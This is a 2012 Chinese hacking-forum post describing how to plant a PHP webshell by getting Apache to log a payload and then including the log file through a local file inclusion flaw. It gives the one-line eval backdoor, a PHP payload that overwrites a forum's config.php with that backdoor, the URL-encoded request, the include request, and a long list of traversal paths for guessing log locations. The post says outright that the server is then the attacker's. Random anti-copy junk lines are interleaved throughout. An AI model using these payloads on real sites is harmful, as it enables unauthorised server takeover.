中国网络渗透测试联盟
标题:
php包含apache日志写马
[打印本页]
作者:
admin
时间:
2012-9-15 14:27
标题:
php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
% z* m' f) t$ u$ w( o n% F
9 r. r; d; ~/ B7 V* c% H6 Q
比如还是这句一句话木马
7 S5 I# f1 w2 C2 Z6 F/ K
<?eval($_POST[cmd]);?>
3 ^* J; [" n$ G* z% E# H& z
; L' P# \$ d& b% \; ?6 q" I. V
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
1 u r* y5 Z8 y$ Q- w4 v
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
, d8 @4 v. `- R2 c+ k$ l5 Z3 I& V
& ^8 e4 V: X* L3 ~0 Y* G: Q9 C4 j
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
0 o K0 i9 x6 B" q( \
fclose($fp);?> //在config.php里写入一句木马语句
. O3 r' y; k, N8 w8 ^$ _3 l
* g \ o: v2 Q D% n1 R4 M
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
, z [9 E' y% t% k
转换为
# \( X& p. j- Q2 f
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
8 a7 P% B" B% B
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
) D7 b' V* ^4 |# e+ [$ H) ?
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
2 m3 `, a$ e" Y4 i9 v* g2 b
fclose%28%24fp%29%3B%3F%3E
1 L1 C& S, c) E- H q
我们提交
6 z" b2 c" X0 X( Q7 F7 C/ x) ~4 F
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
+ P- P" i0 N0 N0 h' \" @
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
+ o3 W0 S0 D I! B" z z8 d3 L
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
3 D4 R# N4 R7 W# _& p. @0 C
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
$ k6 `/ u* q9 k& X
& T0 O) Z' F) |! `3 D
这样就错误日志里就记录下了这行写入webshell的代码。
; _4 v$ K# {/ i1 c& G0 @
我们再来包含日志,提交
) q5 o6 w( B3 P1 R/ \" P% z; _
http://xxx.com/z.php?zizzy=/home
... /logs/www-error_log
3 i' r* ~& y0 P
; T, V' N4 o; L( e7 R$ B, [8 C
这样webshell就写入成功了,config.php里就写入一句木马语句
3 Y" K( [% E$ X6 O1 ? t8 P: E& V
OK.
, T, H; N" J: H9 x
http://www.xxx.com/forum/config.php
这个就成了我们的webshell
* S! o) q8 k( i( R
直接用lanker的客户端一连,主机就是你的了。
+ [3 Y/ y" F* J5 \: P
" l$ x9 R& B% v" K
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
5 c9 y6 k+ }0 T: x' L6 `( t
, d m/ T3 n$ B9 ]. ]5 R
其他的日志路径,你可以去猜,也可以参照这里。
& ?. x7 F& D& j, w9 |
../../../../../../../../../../var/log/httpd/access_log
) t# O! d2 P9 P4 V: G' j! g; j1 ?" f
../../../../../../../../../../var/log/httpd/error_log
}3 F) r5 Z( H( |, x5 |& d
../apache/logs/error.log
6 k' m, s! H& {5 N. z8 H4 V' C
../apache/logs/access.log
; t3 `. y# v( y; O
../../apache/logs/error.log
1 R& h/ V( ~0 e, O
../../apache/logs/access.log
3 F( U( C7 m9 c; [
../../../apache/logs/error.log
/ Y, d! p1 `+ k- V; T, e0 n
../../../apache/logs/access.log
/ \2 G4 h% s n3 a4 Y
../../../../../../../../../../etc/httpd/logs/acces_log
6 K" o; g* k/ q, P
../../../../../../../../../../etc/httpd/logs/acces.log
" H9 L5 H* Q9 ~4 q
../../../../../../../../../../etc/httpd/logs/error_log
6 W- ] C: n: p1 J- F8 `4 q
../../../../../../../../../../etc/httpd/logs/error.log
6 X0 M" j# k/ H& H" ?+ }, v# `
../../../../../../../../../../var/www/logs/access_log
9 D! N( E- e& }& C4 j
../../../../../../../../../../var/www/logs/access.log
" }! o1 @1 Y# h* V8 K3 p3 E( z
../../../../../../../../../../usr/local/apache/logs/access_log
( w- r4 o: \7 h, f: w- I
../../../../../../../../../../usr/local/apache/logs/access.log
/ z# ]( v3 F% d# o
../../../../../../../../../../var/log/apache/access_log
) I; w9 O# i9 A* F! e
../../../../../../../../../../var/log/apache/access.log
* Q( L9 o/ ]/ f! q. u
../../../../../../../../../../var/log/access_log
2 G6 C: }$ H, u! y6 A, v
../../../../../../../../../../var/www/logs/error_log
1 _0 U) o. ]( L* X5 a f
../../../../../../../../../../var/www/logs/error.log
( O) D% W" Y, F9 i: L% d
../../../../../../../../../../usr/local/apache/logs/error_log
9 U' y% m4 D1 z8 g$ h# s. v7 K
../../../../../../../../../../usr/local/apache/logs/error.log
& P( H p# H# J6 d2 Q! o- J4 f
../../../../../../../../../../var/log/apache/error_log
$ l z! R; b) `$ D
../../../../../../../../../../var/log/apache/error.log
/ c1 f6 z2 H- K1 L2 e
../../../../../../../../../../var/log/access_log
# M8 Z) f a, Y* r2 K- `
../../../../../../../../../../var/log/error_log
) E+ @+ R6 s0 J' q f7 B3 e2 F( S
/var/log/httpd/access_log
0 s) P! t. u( P
/var/log/httpd/error_log
3 U- l" X+ M4 T/ F: H
../apache/logs/error.log
: B: R& {9 M6 j' ]! T9 |
../apache/logs/access.log
; ?+ h6 ?- Z$ j& K
../../apache/logs/error.log
7 m& m( G6 x) s4 {( a: m
../../apache/logs/access.log
5 ]! l% e8 X- F; j9 i2 R# ?
../../../apache/logs/error.log
1 B* ~3 N! t) I' R5 D* g2 `; }2 q, K
../../../apache/logs/access.log
0 `: p( F0 Q0 q' a: R
/etc/httpd/logs/acces_log
( t5 T$ q5 x1 ~$ X' z& U7 }2 o" }% F2 a
/etc/httpd/logs/acces.log
6 G$ A& Y& D, J8 w* l0 ^* O- b9 T
/etc/httpd/logs/error_log
, N) }" O- d* o6 i4 a8 y
/etc/httpd/logs/error.log
7 |, W. r l% D4 u. i
/var/www/logs/access_log
& D. g/ O* G8 F; f& \0 k
/var/www/logs/access.log
, N1 _! Y% @$ ?# g# D9 g1 G
/usr/local/apache/logs/access_log
5 \/ q0 W3 p! w/ [0 k
/usr/local/apache/logs/access.log
6 i, C8 u7 G+ w3 J' N' Y( F* M
/var/log/apache/access_log
2 x, _. U4 e7 c& [* q- ?
/var/log/apache/access.log
3 ?8 Y* n8 I5 [0 {3 `) p% \& i
/var/log/access_log
t$ n* d8 W" J. {' r, W1 p8 x0 e
/var/www/logs/error_log
$ j3 h* E( l, N7 l9 [6 H
/var/www/logs/error.log
# T$ J& J+ g6 F* _
/usr/local/apache/logs/error_log
4 o, e) h, \. m& ?- L- @8 d% i5 G3 w
/usr/local/apache/logs/error.log
& O2 ^2 r6 O8 ?
/var/log/apache/error_log
, g( f. U" ?" v6 r- W K) M
/var/log/apache/error.log
1 }9 o: \- U) m* f6 t; ~$ F% A7 c
/var/log/access_log
. s7 N" c6 }/ B7 W
/var/log/error_log
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2